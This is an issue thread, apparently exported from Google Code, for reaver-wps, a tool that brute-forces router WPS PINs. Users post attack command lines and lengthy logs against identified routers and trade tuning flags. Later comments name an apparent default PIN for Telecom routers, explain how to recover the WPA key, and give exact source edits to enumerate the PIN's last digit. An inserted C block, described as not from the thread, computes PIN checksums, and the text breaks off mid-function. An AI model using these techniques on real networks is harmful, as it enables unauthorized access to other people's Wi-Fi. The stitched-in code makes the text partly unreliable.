realing / reaver-wps

Automatically exported from code.google.com/p/reaver-wps

Stuck 99.99%, repeats one key #195

Open GoogleCodeExporter opened 9 years ago

GoogleCodeExporter commented 9 years ago
0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.)

rev 112

1. What operating system are you using (Linux is the only supported OS)?

Ubuntu 10.10

2. Is your wireless card in monitor mode (yes/no)?

Yes

3. What is the signal strength of the Access Point you are trying to crack?

4. What is the manufacturer and model # of the device you are trying to
crack?

43db

5. What is the entire command line string you are supplying to reaver?

sudo reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -a and sometimes -p argument

6. Please describe what you think the issue is.

I don't know, it gets stuck at 99% and keeps repeating the same PIN.

7. Paste the output from Reaver below.

It's big so I put it here http://pastebin.com/raw.php?i=RDzF0FBz

Original issue reported on code.google.com by darknw...@gmail.com on 28 Jan 2012 at 10:30

GoogleCodeExporter commented 9 years ago
nobody?

Original comment by darknw...@gmail.com on 30 Jan 2012 at 4:32

GoogleCodeExporter commented 9 years ago
I also have the same problem... does a resolution exist????

Original comment by davidewe...@gmail.com on 30 Jan 2012 at 8:28

GoogleCodeExporter commented 9 years ago
Ubuntu 11.10
  wireless: Broadcom
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[?] Restore previous session for D4:D1:84:DD:0A:43? [n/Y] Y
[+] Restored previous session
[+] Waiting for beacon from D4:D1:84:DD:0A:43
[+] Switching mon0 to channel 1
[+] Associated with D4:D1:84:DD:0A:43 (ESSID: Telecom-81594941)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 99.99% complete @ 2012-01-30 21:53:33 (10 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2012-01-30 21:53:53 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] 99.99% complete @ 2012-01-30 21:54:14 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2012-01-30 21:54:35 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] 99.99% complete @ 2012-01-30 21:54:54 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] 99.99% complete @ 2012-01-30 21:55:16 (8 seconds/pin)
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 01239980
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin

Original comment by davidewe...@gmail.com on 30 Jan 2012 at 9:02

GoogleCodeExporter commented 9 years ago
Me too, I have a similar problem but I don't know what happens :(

Original comment by vladys.3...@gmail.com on 31 Jan 2012 at 2:27

GoogleCodeExporter commented 9 years ago
nobody??

Original comment by davidewe...@gmail.com on 3 Feb 2012 at 2:37

GoogleCodeExporter commented 9 years ago
#wps transaction failed (code: 0x02), re-trying last pin
#wps transaction failed (code: 0x03), re-trying last pin

I've experienced the same issues using an Alfa rtl8187. I've found the solution 
to the problem is to play with the "-d" flag.

Start at "-d 15" or higher until you stop receiving the (code: 0x02) (code: 
0x03) errors. Then work your way down. Each router I've tested likes a 
different value. 

I was also using the "--no-nacks" argument.

Original comment by cryptom...@gmail.com on 4 Feb 2012 at 6:07

GoogleCodeExporter commented 9 years ago
Hi

I have exactly the same problem.
I also tried -d 15 or -N and this solution 
http://code.google.com/p/reaver-wps/issues/detail?id=88#c4
but it didn't work!

This is my log file:
root@bt:~# reaver -i mon0 -b 00:1E:E3:EA:FE:27 -L -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[?] Restore previous session for 00:1E:E3:EA:FE:27? [n/Y] y
[+] Restored previous session
[+] Waiting for beacon from 00:1E:E3:EA:FE:27
[+] Switching mon0 to channel 1
[+] Associated with 00:1E:E3:EA:FE:27 (ESSID: WLAN_FE27)
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 91.00% complete @ 2012-02-09 00:18:43 (3 seconds/pin)
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x03), re-trying last pin
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] 91.04% complete @ 2012-02-09 00:18:58 (3 seconds/pin)
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[+] Trying pin 12349982
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
^C
[+] Session saved.

and you can download my capture file from here

http://www.mediafire.com/?kzc5utohkjlo67l

It seems there is a bug in reaver 1.4 (stable version).

Please consider this issue.
I am looking forward to hearing from you soon.

Original comment by saeed.y2...@gmail.com on 9 Feb 2012 at 6:57

GoogleCodeExporter commented 9 years ago
0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.)

rev 112

1. What operating system are you using (Linux is the only supported OS)?

Backtrack 5

2. Is your wireless card in monitor mode (yes/no)?

Yes

3. What is the signal strength of the Access Point you are trying to crack?

-76 db

4. What is the manufacturer and model # of the device you are trying to
crack?

ADB Broadband Italia/Pirelli

5. What is the entire command line string you are supplying to reaver?

reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv --win7 --no-nacks --dh-small -d 10/15 
-c 6 

6. Please describe what you think the issue is.

It seems like the 1st part of the pin, 0123, is correct and it starts at 90% 
complete. Runs till 99.99%, last pin 01239980.
At start ... right after the 90% complete ... if I open the mac.wpc, at the 1st 
line the number is 2 - after reading some docs that means the pin is fully 
broken.

7. Paste the output from Reaver below.

2
5
1
1234
0000
0123
1111
2222
3333
4444
5555
6666
7777
8888
9999
0001
....

Original comment by music.an...@gmail.com on 16 Feb 2012 at 7:00

GoogleCodeExporter commented 9 years ago
I only have success using backtrack with -50 signals or higher, -45, -40 and so on.

So try to get closer. In Backtrack "the less the better"

Original comment by frederi...@gmail.com on 20 Feb 2012 at 4:34

GoogleCodeExporter commented 9 years ago
Hey .. it seems all Telecom routers are the same .. it gives me the same error,
the 1st 4 digits are correct: 0123, but the rest is all wrong ..
I can't understand if it's a time of protection or what..
btw I tried on another Telecom router and same thing.

I have access to the 1st one but the pin isn't written anywhere .. I looked 
around in the settings and info .. but couldn't find the correct one.
It seems the router generates the pin once the button has been clicked.

Original comment by richardj...@gmail.com on 20 Feb 2012 at 11:40

GoogleCodeExporter commented 9 years ago
Same thing here with Telecom router. 

Original comment by fiftyeig...@gmail.com on 21 Feb 2012 at 4:31

GoogleCodeExporter commented 9 years ago
I wanted to add as an issue ... WPS protection is enabled but the method to 
register with the AP is by "Push Button" instead of PIN.
Btw richardj ... I tested on a Telecom modem also :) .

Anyway I think that wash+reaver should distinguish between push button 
and pin. It will save us a lot of wasted time :D

Original comment by music.an...@gmail.com on 22 Feb 2012 at 6:08

GoogleCodeExporter commented 9 years ago
It shouldn't matter if it's a push button pin. You still can become a registrar 
by trying out all the pins. It must be something else.

Original comment by fiftyeig...@gmail.com on 26 Feb 2012 at 12:59

GoogleCodeExporter commented 9 years ago
3rd Telecom modem/router - same old damn issue :) 0123 correct. 2nd part a waste 
of time.
Off-topic: I hate Telecom :)

Original comment by music.an...@gmail.com on 18 Mar 2012 at 7:55

GoogleCodeExporter commented 9 years ago
Hi All
I have the same issue, how to fix? I use reaver 1.3 and reaver 1.4. But none of 
them work.

Original comment by alksande...@gmail.com on 18 Mar 2012 at 11:43

GoogleCodeExporter commented 9 years ago
I tested many ADSL modems .....Planet ADW-XXXX .....such a problem with rtl8187b 
and AR9002WB-1NG ...BACKTRACK 5 R2.... They are Telecom too!!! please help

Original comment by klui...@gmail.com on 23 Mar 2012 at 8:55

GoogleCodeExporter commented 9 years ago
Could anybody analyse the problem?

Original comment by saeed.y2...@gmail.com on 23 Mar 2012 at 9:14

GoogleCodeExporter commented 9 years ago
Does somebody know how to write to the author of the program directly?

Original comment by klui...@gmail.com on 23 Mar 2012 at 9:26

GoogleCodeExporter commented 9 years ago
This problem is only with Telecom modems!!!!! PLEASE HELP!!!!!

Original comment by klui...@gmail.com on 23 Mar 2012 at 9:27

GoogleCodeExporter commented 9 years ago
telecom of which country? :D

Original comment by livewin...@gmail.com on 27 Mar 2012 at 8:29

GoogleCodeExporter commented 9 years ago
Pridnestrovian Moldavian Republic

Original comment by klui...@gmail.com on 28 Mar 2012 at 8:46

GoogleCodeExporter commented 9 years ago
I had reformatted my system just because I allocated partitions wrong...after 
installing BT5R1 
I started getting this error...I did apt-get update to make sure I was up to 
date.

---Then I got the wicd dsub interface error which I corrected with : 

-reconfigure wicd
update-rc.d wicd defaults

---Still, got the repeating error stuck at 99.9% so I went and did this POST #3 
:

http://code.google.com/p/reaver-wps/wiki/Resources

---Still getting the error after all that, I decided I'd start the process over 
and not resume...lo and behold it got all the wps and wpa keys.

In my troubleshooting process I removed macchanging as I find it to give me 
errors every so often

My cli started out as :

Reaver -i xxxx -b xx xx xx xx -w -N -S --mac=xx xx xx xx

Then it ended up as 

Reaver -i xxxx -b xx xx xx xx -w -N -S -l 300 

Not sure if this will help anyone, but this is what I did to get past the 99% 
problem.

Original comment by xpresspa...@gmail.com on 24 May 2012 at 6:43

GoogleCodeExporter commented 9 years ago
I was having the same problem also, I had manually put the first half of the 
pin trying to accelerate the process and started at 90.01 % then it was 
trying different pins but only the second half was changing since I had put the 
first half manually. After it reached 99.99% it stopped trying different pins, 
so I terminated the process and started from scratch this time without manually 
putting in the first half of the pin. Then I saw that the first half was wrong 
even though it started at 90.01%. Mind you I never saw a "Receive M5 or M6 
message " when the first half of the pin was wrong. Probably start over again 
and see if it works without the -p argument.

Original comment by Leonardo...@gmail.com on 31 Aug 2012 at 5:19

GoogleCodeExporter commented 9 years ago
Good evening
I can tell you the reason for this issue and how to solve it. I came across the 
solution in these last 3 days of spare time. It took me some "mumble mumble" and a 
little bit of coding.

You get to 99.99% and get stuck because reaver has attempted all the pins that it knows.
So what if the right pin is not known to reaver?

While the first 7 digits are consecutive numbers, the last digit is a checksum,
so reaver attempts 10^7 pins, not 10^8 (and that's good!)

But what if the target AP PIN is one of the 9000 not computed?

Solution:
With exhaustive attempts (a small modification of the code under /src/) in the 
range from 01230000 to 01239999 you will find the right pin (the first 4 digits are 
those recognized by reaver).
These are 10^4 pins that at 7 sec./pin will take 19 hours and 30 minutes to 
look for them all.

Conclusion:
Luckily it took me 5 hours (more or less 2500 attempted pins), that's because of 
how I implemented the exhaustive algorithm and because the pin was 01234567 
(yes seriously, you can expect others to be 12345678).

Next issue:
At this point reaver communicates that this is the right pin but doesn't give the WPA 
PSK.
I used the wpa_supplicant & wpa_cli method (issue 203 comment 6) and it works 
like a charm! 
Now the problem is that after retrieving the PSK and connecting with success, the AP has 
turned off WPS. I don't mean WPS LOCK, I mean the AP no longer shows up under 
wash, and if I try to associate through aireplay (I always used it to associate 
during pin attempts) it gives this error message: Denied (code 12), wrong ESSID or 
WPA ? 

From now I will shut the connection with this AP for 12 hours to see if it turns 
WPS on again.

Hope that all the things I wrote are interesting for someone!

saluti!

Original comment by stefano....@gmail.com on 5 Sep 2012 at 12:29

GoogleCodeExporter commented 9 years ago
I got some news.

Shutting the connection is useless for WPS reactivation.

!!! after 48 hours the AP rebooted by itself, reactivating WPS with the same old 
pin. !!!

Yesterday I tried to reactivate it from telnet but there is no command to 
accomplish the task (some routers have it).

From 'system shell' I found some directories named "wps...." but didn't have 
time to investigate.

A couple of things about this AP I found in 'system ver':
Version: 4.5.3.AGPWI_1.0.3
Platform: P.DG A4001N

That's all folks!
saluti!

Original comment by stefano....@gmail.com on 7 Sep 2012 at 6:26

GoogleCodeExporter commented 9 years ago
So you got through the 99,99% error by adding some modifications into /src/???
Would you please share your modifications here? I'm dealing with this issue as 
well: I'm testing Reaver with many different commercial routers I own, but it 
doesn't seem to work with any of them....and the developer has not been 
updating it in months....

Thanks in advance

Original comment by Twai...@gmail.com on 11 Sep 2012 at 2:57

GoogleCodeExporter commented 9 years ago
I'm dealing with this issue as well, 99.99%, on BT5 R1 and BT5 R3 with reaver 1.3 
or 1.4. Please help.

Original comment by bemono...@gmail.com on 14 Sep 2012 at 4:55

GoogleCodeExporter commented 9 years ago
Stefano, thank you very much!
As described in issue 203 comment 6, wpa_supplicant works perfectly. My Telecom 
was 01234567 too. It seems all Telecom routers have this pin by default.
It would be very useful if there was an option in reaver to ignore calculation 
and bruteforce last checksum digit.

Original comment by dnd...@gmail.com on 24 Sep 2012 at 6:05

GoogleCodeExporter commented 9 years ago
Has anyone managed to work out what modifications Stefano made ? :(

Original comment by keyfo...@veryrealemail.com on 24 Sep 2012 at 10:04

GoogleCodeExporter commented 9 years ago
Stefano seems to have found the cause of the block; could you post the 
changes you made, so that we can imitate them? Thank you very much.
PS: sorry for my English    :-)

Original comment by leonardo...@hotmail.it on 29 Sep 2012 at 5:23

GoogleCodeExporter commented 9 years ago
Stefano, I have the 99.99% problem too. Where can I find the pins.c modifications 
to resolve this and how do I implement them? If I use reaver-1.4 the first 4 PIN 
digits are always 1234 and the 99.99% problem happens. On reaver-1.3 the first 4 
digits are variable but no cracked PIN is found.

Original comment by mradulov...@gmail.com on 9 Oct 2012 at 1:16

GoogleCodeExporter commented 9 years ago
... and reaver starts from 90%. I tried the -p option with 0123, 0000, always the 
same.
The signal strength is -78 to -82, maybe that's the problem?

Original comment by mradulov...@gmail.com on 10 Oct 2012 at 9:38

GoogleCodeExporter commented 9 years ago
@ Stefano (comment 33):
I tried the wpa_cli method you suggested with what should be T*****m's default 
wps pin, but no luck, so I guess I'll need to figure out and push in your 
modifications, to test my routers against it.
I read both the info links and the pins.c file you mentioned above, but no luck.
I'm no coder at all but, afaik, the only way should be changing the code to 
make pin tests try combinations starting with a '0' , as well as ordinary 
ones...am I right?
As I said, I'm no coder, but I'll appreciate any help on the matter at hand...

Original comment by Twai...@gmail.com on 13 Oct 2012 at 10:12

GoogleCodeExporter commented 9 years ago
So how do we edit the source (I'm assuming pins.c) to not do the checksum and 
instead check the entire keyspace? Can you be specific on what needs changing?

Original comment by ingen...@gmail.com on 16 Oct 2012 at 6:01

GoogleCodeExporter commented 9 years ago
First of all excuse my English.

@ Stefano hit the point.

I had the same problem, after many tries I only got the first part of the pin, 
and it gets stuck at 99.99% trying the same pin.

I looked at pins.c and I made a quick fix; the idea is:

First: try ALL the keys ending in 0. If you have the first part of the pin, 
it takes 1000 tries. (Try -p xxxx0000 and you will see reaver changes it to 
xxxx0002, so the pin xxxx0000 will never be tested).

Second: if the pin does not end in 0, try all the pins ending in 1, after that, 
ending in 2, etc...

So I changed the line

snprintf(pin, pin_len, "%s%d", key, wps_pin_checksum(atoi(key)));

for

snprintf(pin, pin_len, "%s%d", key, 0);

Look at the change: I changed wps_pin_checksum(atoi(key)) to 0, that is, 
it will generate keys ending in 0.

After trying all the keys ending in 0, with no luck, I tried this

snprintf(pin, pin_len, "%s%d", key, 1); --> all the keys ending in one.

I got lucky, the key ended in 1, and it was found at 93.15%.

(Remember, after editing pins.c, do

gcc -c pins.c
make
make install)

I know it's not a well-done fix, but I'm not a C programmer.

Hope this helps someone.

Original comment by Tys...@gmail.com on 21 Oct 2012 at 8:45
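The check digit behind Stefano's 10^7-versus-10^8 explanation (comment of 5 Sep 2012) and Tystar's replacement of wps_pin_checksum() above, as an added illustration that is not code from this thread or from reaver itself (the check-digit routine mirrors the wps_pin_checksum() function reaver takes from wpa_supplicant): it shows why a checksum-aware enumeration never emits 01234567 and confirms the 1000-of-10000 figure for the 0123xxxx range. The sample PINs are the ones quoted in this thread; nothing else is assumed.

```c
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/*
 * WPS PIN check digit as defined by the Wi-Fi Simple Configuration spec; this
 * mirrors wps_pin_checksum() from wpa_supplicant, which reaver reuses.
 * pin7 is the 7-digit prefix as an integer (leading zeros contribute 0).
 */
int wps_pin_checksum(unsigned int pin7)
{
    unsigned int accum = 0;
    while (pin7) {
        accum += 3 * (pin7 % 10);   /* digits 7, 5, 3, 1 from the left: weight 3 */
        pin7 /= 10;
        accum += pin7 % 10;         /* digits 6, 4, 2: weight 1 */
        pin7 /= 10;
    }
    return (int)((10 - accum % 10) % 10);
}

/* Parse exactly n ASCII digits from s; false on any non-digit or short input. */
static bool parse_digits(const char *s, size_t n, unsigned int *out)
{
    unsigned int v = 0;
    if (strlen(s) < n)
        return false;
    for (size_t i = 0; i < n; i++) {
        if (!isdigit((unsigned char)s[i]))
            return false;
        v = v * 10 + (unsigned int)(s[i] - '0');
    }
    *out = v;
    return true;
}

/* True if pin is exactly 8 digits and its last digit is the spec checksum. */
bool wps_pin_valid(const char *pin)
{
    unsigned int prefix, last;
    if (strlen(pin) != 8)
        return false;
    if (!parse_digits(pin, 7, &prefix) || !parse_digits(pin + 7, 1, &last))
        return false;
    return (int)last == wps_pin_checksum(prefix);
}

/*
 * Write into fixed[9] the checksum-correct PIN sharing pin's first seven digits.
 * If the result differs from pin, a checksum-aware enumeration such as reaver's
 * build_wps_pin() never emits pin: the run reaches 99.99% and stops there.
 */
bool wps_pin_fix_checksum(const char *pin, char fixed[9])
{
    unsigned int prefix;
    if (strlen(pin) != 8 || !parse_digits(pin, 7, &prefix))
        return false;
    snprintf(fixed, 9, "%07u%d", prefix, wps_pin_checksum(prefix));
    return true;
}

/*
 * Count the PINs first4 0000..9999 that pass the checksum: the size of the
 * second-half search once the first half is known.  The remaining
 * 10^4 - count PINs in that range are the ones never attempted.
 */
unsigned int wps_pins_valid_in_half(const char *first4)
{
    unsigned int p1, count = 0;
    char pin[9];
    if (strlen(first4) != 4 || !parse_digits(first4, 4, &p1))
        return 0;
    for (unsigned int p2 = 0; p2 < 10000; p2++) {
        snprintf(pin, sizeof pin, "%04u%04u", p1, p2);
        if (wps_pin_valid(pin))
            count++;
    }
    return count;
}

int main(void)
{
    /* Constructed sample set: the factory PIN and the two "stuck" PINs quoted in this thread. */
    const char *samples[] = { "01234567", "01239980", "12349982" };
    char fixed[9];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        wps_pin_fix_checksum(samples[i], fixed);
        printf("%s: checksum %-8s checksum-valid form: %s\n", samples[i],
               wps_pin_valid(samples[i]) ? "ok" : "MISMATCH", fixed);
    }
    printf("checksum-valid PINs in 0123xxxx: %u of 10000\n",
           wps_pins_valid_in_half("0123"));
    return 0;
}
```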

GoogleCodeExporter commented 9 years ago
I'm proud of you Tystar! 
You tried harder than anybody else looking for the insight and then you saw the 
light.
So it's time to show that light to all the masses.

Assumptions:
-the router accepts WPS transactions, so it's not continuously giving you 
"timeout".
-you know the first 4 digits of the pin (for example 0123 or 1234 or whatever);
retrieve this information using the original reaver before applying the 
modification.
---------------------------------------------------------------------------------------------
download reaver:
svn checkout http://reaver-wps.googlecode.com/svn/trunk/ reaver-wps-read-only

open the file /root/reaver-wps-read-only/src/pins.c with a text editor
(save a copy, you will need it to reinstall the original reaver)
after #include "pins.h" SUBSTITUTE THE FIRST FUNCTION WITH THIS SAME FUNCTION 
(modified):

/* EXHAUSTIVE MOD. init */
/*
 * in these lines trivial modifications are applied over the original code.
 * these lines have to be considered for demonstration purpose only.
 * WPA PSK retrieval is not granted.
 * http://code.google.com/p/reaver-wps/issues/detail?id=195
 */

/* set global vars: the last digit counts down 9..0, then the p2 table index advances */
int exhaustive_last_digit = 9;
int exhaustive_index = 0;

/* Builds a WPS PIN from the key tables (last digit enumerated instead of computed) */
